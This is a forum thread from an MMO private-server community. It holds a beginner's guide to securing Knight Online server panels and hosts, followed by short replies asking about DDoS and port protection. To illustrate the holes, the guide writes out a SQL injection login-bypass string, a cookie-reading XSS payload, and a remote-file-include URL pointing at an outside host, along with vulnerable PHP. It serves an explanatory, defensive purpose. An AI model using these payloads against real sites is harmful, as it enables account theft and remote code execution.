Welcome!

Join our community of MMO enthusiasts and game developers! By registering, you'll gain access to discussions on the latest developments in MMO server files and collaborate with like-minded individuals. Join us today and unlock the potential of MMO server development!

Join Today!

Got hacked?Afraid of getting hacked?

Newbie Spellweaver
Joined
Jun 29, 2007
Messages
22
Reaction score
0
Hi all,
I decided to write my first guide becaze recently i got too many pms about security of ko servers.
I will tell you how to make your server as secure as it should be.


  • KOPANEL
  • PORTS
  • FORUM

KOPANEL:

Well, kopanels what u downloaded from ragezone or u got it from someone else is just not SECURE because its source is known by other ppl so if they find a vulnerability they can hack u anytime...
I suggest you to write your own kopanels BUT:
make sure you dont allow any kind of XSS sql injections in it, file uploading or rfi security hole.
If you dont know anything about php then kopanel is ok for u but it sill has some security problems.
Before you add something to your kopanel look at the code it may contain dangerous code.
How to secure your panel from sql injection?
Test() all $_POST and $_GET data in the source.
What about XSS attacks?
Disable the javascript on some parts of your kopanel.

Exampe for sql injection:
in login.php

$msquery="SELECT COUNT(strACcountID) FROM tb_user WHERE strACcountID = '$login' AND strPasswd = '$pass'";

so if i write in login gerydeft' or '1'='1 and in password pass' or '1'='1 our query will look like this:

$msquery="SELECT COUNT(strACcountID) FROM tb_user WHERE strACcountID = 'gerydeft' or '1'='1' AND strPasswd = 'pass' or '1'='1'";

becaze 1 is always equals to 1 it will log me in on gerydeft's acc

(this is just a typical sql injection there are alot of way to execute this hack.)

U could say i cant insert this long sting because
<td>User:</td>
<td><input type="text" class="input" name="user" value="" maxlength="12" size="12"></td>

Thats false.This is client side code so i can edit it as i want.
So what is the way to fix it?

If u have heteric's anti_sqlinjection.php
then include it and test() all get an post data

How an XSS attack(Cross site scripting) looks like?

plenty places on the web input fields are vulnerable for this hack.
for example i would write <script>alert(document.cookie)</script>

this script is in the source and if ragezone wouldnt secure now i could steal your accounts.
how?i would send your cookies to my server and inject it.
XSS attack can only execute client side script, not server side.

What about server side PHP scripts?
There is a hack called RFI(Remote File include)
like a php say:
vuln.php:
PHP:
<?php
include($_GET["act"]);
?>
so i execute: vuln.php?act=http://mysite.com/phpcode.txt

and all php codes in my txt would run.

One more suggestion:Always use the most recent php version and dont leave server.ini in your www folder
(or anybody can read it)

PORTS:
Well if u have router basically most ports are closed but, if u dont have i suggest u to install a firewall
and close some these ports:
21 ftp (only if ur server doenst use this)
23 telnet
1433 mssql
3306 mysql

be careful dont close gameports or 80 or your website will be down

Also dont let remote or ur server rather use VNC or temaviewer and if u can only let connections from u

Change your mssql password once a week and never test somethig on your own server, rather test it on your pc.

If u got DDoSd closing ports also a way to fix it.

Often make backup once or twice a week..

FORUM:
Forums are also a vunerably systems of your server.
I suggest u to use an external forum, and do not store passwords or anything important in ur PM box.

Disable xp_cmdshell command in your mssql database.
Also disable net.exe and net2.exe in system32 folder

Gl with your server, sry for my grammar iam not english man^^












 
Last edited by a moderator:
Experienced Elementalist
Joined
Dec 7, 2006
Messages
250
Reaction score
2
Re: [Guide] Got hacked?Afraid of getting hacked?

nice, what about ddos protection?
 
Newbie Spellweaver
Joined
Nov 17, 2008
Messages
19
Reaction score
0
Re: [Guide] Got hacked?Afraid of getting hacked?

Anyway to protect the ebenezer from ports attacks?
 
Newbie Spellweaver
Joined
Apr 18, 2008
Messages
24
Reaction score
0
Re: [Guide] Got hacked?Afraid of getting hacked?

Change the ebenezer port, simple as that?
 
Back
Top